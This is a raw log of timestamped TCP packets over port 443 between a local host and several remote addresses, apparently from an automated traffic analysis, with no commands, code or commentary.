                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.641587019 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.641592026 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.642004967 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.642009974 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.751739979 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.752567053 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.755168915 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.755176067 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.755448103 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.757414103 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.757487059 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.757494926 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.757653952 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.799336910 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.832346916 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.835299015 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.835335016 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.843554020 CET4434978618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.843672991 CET4434978618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.843703985 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:32.843739986 CET49786443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.018562078 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.018630981 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.019376040 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.019450903 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.019467115 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.019490957 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.019496918 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.022602081 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.022666931 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.033482075 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.037045002 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.037787914 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.038153887 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.038161039 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.039182901 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.039241076 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.040206909 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.040273905 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.040405035 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.040411949 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.079292059 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.079339027 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.079474926 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.079483032 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.079967976 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.080518007 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.080533028 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.080540895 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.080602884 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081557035 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081581116 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081624031 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081660032 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081935883 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.081943989 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.083712101 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.083784103 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.084099054 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.084106922 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.133567095 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.133630037 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.136954069 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.136984110 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.137348890 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.137372971 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.175632954 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.175647974 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.291333914 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.291414022 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.334673882 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.338401079 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.338445902 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.373294115 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.379429102 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.379467010 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.382131100 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.423331976 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.442167044 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.442293882 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.442363977 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.442578077 CET49775443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.442595005 CET4434977520.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.468631983 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.468708038 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.468758106 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.469234943 CET49806443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.469247103 CET44349806172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.493347883 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.520184040 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.520216942 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.522819042 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.523951054 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.524029016 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.524076939 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.524616957 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.524676085 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.525036097 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.530026913 CET49804443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.530038118 CET44349804172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.530411005 CET49805443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.530426979 CET44349805162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.563335896 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.572762966 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.572987080 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.572999001 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.573381901 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.573396921 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.573436975 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.573443890 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.573488951 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.574249983 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.575356960 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.575431108 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.575536013 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.575541973 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.694616079 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.698275089 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.698307991 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.741830111 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.742110014 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.742119074 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.743192911 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.743263960 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.743607998 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.743685007 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.743758917 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.782660961 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.785429955 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.785455942 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.787327051 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.787333965 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.787404060 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.787527084 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.819315910 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.819324017 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.819559097 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.819637060 CET44349809162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.819696903 CET49809443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.831334114 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.866108894 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.866352081 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.866367102 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.867726088 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.867837906 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.868230104 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.868280888 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.868304014 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.898305893 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.898591042 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.898607969 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.899663925 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.899739981 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.900060892 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.900127888 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.937412024 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.940438032 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.940460920 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.942343950 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.983338118 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.985248089 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.985285997 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.985359907 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.985447884 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.985459089 CET44349810172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986366987 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986398935 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986499071 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986797094 CET49812443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986813068 CET44349812162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.986989021 CET49813443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.987003088 CET44349813162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.004581928 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.004591942 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.090425968 CET49810443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.090643883 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.090720892 CET44349811172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.090794086 CET49811443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.138603926 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.141407013 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.141450882 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.215811968 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.215854883 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.216145992 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.216783047 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.216816902 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.217008114 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.217576981 CET49814443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.217602015 CET44349814162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.217673063 CET49815443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.217684984 CET44349815162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.218776941 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.222760916 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.222781897 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.225008011 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.267364025 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.271325111 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.271421909 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.271523952 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.271537066 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.282933950 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.282990932 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.282999039 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.292609930 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.292673111 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.292680979 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.302293062 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.302362919 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.302381039 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.314002991 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.314053059 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.314063072 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.327676058 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.327739000 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.327761889 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.387332916 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.387351990 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.391539097 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.391586065 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.391593933 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.403167009 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.406002045 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.406021118 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.407860041 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.453886986 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.453938961 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.453955889 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.455327034 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.458544016 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.458594084 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.458600998 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.470868111 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.470917940 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.470931053 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.484451056 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.484503984 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.484513998 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.498313904 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.498363972 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.498373032 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.512089968 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.512134075 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.512141943 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.525690079 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.525749922 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.525757074 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.539433002 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.539520025 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.539526939 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.553108931 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.553153992 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.553159952 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.566829920 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.566875935 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.566883087 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.579989910 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.580038071 CET49797443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.580043077 CET44349797172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.592833042 CET44349797172.217.19.225192.168.2.6
